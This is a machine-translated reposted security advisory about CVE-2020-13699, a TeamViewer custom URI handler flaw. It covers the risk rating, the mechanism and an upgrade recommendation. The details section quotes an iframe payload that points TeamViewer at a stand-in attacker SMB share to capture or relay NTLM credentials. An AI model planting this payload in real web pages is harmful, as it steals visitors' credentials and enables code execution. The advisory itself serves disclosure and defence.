Shulou(Shulou.com)06/01 Report--

This article is about how to analyze TeamViewer user password cracking loopholes, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, say no more, follow the editor to have a look.

Brief introduction of 0x01 vulnerability

On August 10, 2020, 360CERT Monitoring found that TeamViewer officially issued a risk notice for TeamViewerURL processing, the vulnerability number is CVE-2020-13699, vulnerability level: high risk, vulnerability score: 8.8.

TeamViewer has a security flaw in unreferenced search paths or elements, more specifically, because the application does not properly reference its custom URI handler, which can be exploited by hackers when a user with a vulnerable version of TeamViewer visits a maliciously crafted website.

In this regard, 360CERT recommends that the majority of users upgrade TeamViewer to version 15.8.3 in time. At the same time, please do a good job of asset self-examination and prevention to avoid hacker attacks.

0x02 risk rating

360CERT's assessment of the vulnerability is as follows

Assessment methods, threat levels, high risk impact surfaces, extensive 360CERT scores, 8.8 0x03 vulnerability details

TeamViewer is mainly used for remote access and control of various types of computer systems and mobile devices, but also provides collaboration and presentation capabilities (for example, desktop sharing, web conferencing, file transfer, and so on).

TeamViewer has a security flaw in unreferenced search paths or elements, more specifically, because the application does not correctly reference its custom URI handler, which may be exploited when a system with a vulnerable version of TeamViewer visits a maliciously created website, and an attacker can embed malicious iframe in the website using elaborate URL (iframesrc='teamviewer10:--play\ attacker-IP\ share\ fake.tvs'). This starts the TeamViewerWindows desktop client and forces it to do the following: open the remote SMB share. Windows performs NTLM authentication when the SMB share is opened, and the request can be forwarded (using a tool such as a responder) to execute the code (or captured for hashing).

0x04 affects version

TeamViewer

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.